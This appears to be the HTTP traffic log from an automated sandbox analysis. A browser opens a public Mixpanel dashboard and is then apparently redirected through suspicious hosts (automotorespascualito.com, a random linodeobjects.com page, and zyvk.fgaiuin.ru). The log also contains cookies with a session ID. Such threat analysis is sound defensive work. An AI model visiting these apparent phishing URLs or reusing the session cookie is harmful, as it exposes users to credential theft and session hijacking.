                Source: global trafficHTTP traffic detected: GET /marketing-site/static/favicons/favicon-32x32.png HTTP/1.1Host: cdn.mxpnl.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /api/app/public/dashboards/75842ed5-2e21-48a8-81e7-e762e80766ad/ HTTP/1.1Host: mixpanel.comConnection: keep-alivetraceparent: 00-771dffb91fce68d67b213ed0f19212e2-985fa734901d8e9f-01sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfiAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"
                Source: global trafficHTTP traffic detected: GET /static/marketing/fonts/apercu/web/5.008/apercu-medium-pro.woff2 HTTP/1.1Host: cdn.mxpnl.comConnection: keep-aliveOrigin: https://mixpanel.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.mxpnl.com/static/asset-cache/a54fa472f3ee8b06515c/reports/global-styles.min.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /sdk/1/environments/9sZai6GO-WSS/config HTTP/1.1Host: api.sprig.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /api/app/public/dashboards/75842ed5-2e21-48a8-81e7-e762e80766ad/ HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"; sessionid=e8t3lapqi198t4w0069dx695dvxfgk5a
                Source: global trafficHTTP traffic detected: GET /api/app/public/dashboards/75842ed5-2e21-48a8-81e7-e762e80766ad/metadata HTTP/1.1Host: mixpanel.comConnection: keep-alivetraceparent: 00-65afd88aa325f217fe696904ff36f4b5-b4379e3995edadcc-01sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfiAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"; sessionid=e8t3lapqi198t4w0069dx695dvxfgk5a
                Source: global trafficHTTP traffic detected: GET /tproxy/track/?verbose=1&ip=1&_=1743011008689 HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"; sessionid=e8t3lapqi198t4w0069dx695dvxfgk5a
                Source: global trafficHTTP traffic detected: GET /tproxy/track/?verbose=1&ip=1&_=1743011009143 HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"; sessionid=e8t3lapqi198t4w0069dx695dvxfgk5a
                Source: global trafficHTTP traffic detected: GET /api/app/public/dashboards/75842ed5-2e21-48a8-81e7-e762e80766ad/metadata HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"; sessionid=e8t3lapqi198t4w0069dx695dvxfgk5a
                Source: global trafficHTTP traffic detected: GET /static/marketing/fonts/apercu/web/5.008/apercu-bold-pro.woff2 HTTP/1.1Host: cdn.mxpnl.comConnection: keep-aliveOrigin: https://mixpanel.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.mxpnl.com/static/asset-cache/a54fa472f3ee8b06515c/reports/global-styles.min.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /tproxy/track/?verbose=1&ip=1&_=1743011011208 HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"; sessionid=e8t3lapqi198t4w0069dx695dvxfgk5a
                Source: global trafficHTTP traffic detected: GET /tproxy/track/?verbose=1&ip=1&_=1743011011622 HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"; sessionid=e8t3lapqi198t4w0069dx695dvxfgk5a
                Source: global trafficHTTP traffic detected: GET /tproxy/record/?%24current_url=https%3A%2F%2Fmixpanel.com%2Fpublic%2FFWfQuhi1aNTS16WPXLxRfi&%24lib_version=2.62.0&batch_start_time=1743010999.37&distinct_id=%24device%3A4a547060-e464-434e-957b-7d427db9c832&mp_lib=web&replay_id=ea6efaba-c433-4b59-bf32-a7baec207ab2&replay_length_ms=10787&replay_start_time=1743010999.37&replay_start_url=https%3A%2F%2Fmixpanel.com%2Fpublic%2FFWfQuhi1aNTS16WPXLxRfi&seq=0&%24device_id=4a547060-e464-434e-957b-7d427db9c832&format=gzip HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"; sessionid=e8t3lapqi198t4w0069dx695dvxfgk5a
                Source: global trafficHTTP traffic detected: GET /v1/traces HTTP/1.1Host: api.honeycomb.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /hpp/index.php HTTP/1.1Host: automotorespascualito.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /v1/traces HTTP/1.1Host: api.honeycomb.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /900pppejdedr.html HTTP/1.1Host: prudn87837498798487434.us-lax-1.linodeobjects.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://automotorespascualito.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /vEWf_VsEQpE6SZ7Y1x7k/ HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://prudn87837498798487434.us-lax-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /tproxy/track/?verbose=1&ip=1&_=1743011014983 HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"; sessionid=e8t3lapqi198t4w0069dx695dvxfgk5a
                Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://zyvk.fgaiuin.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
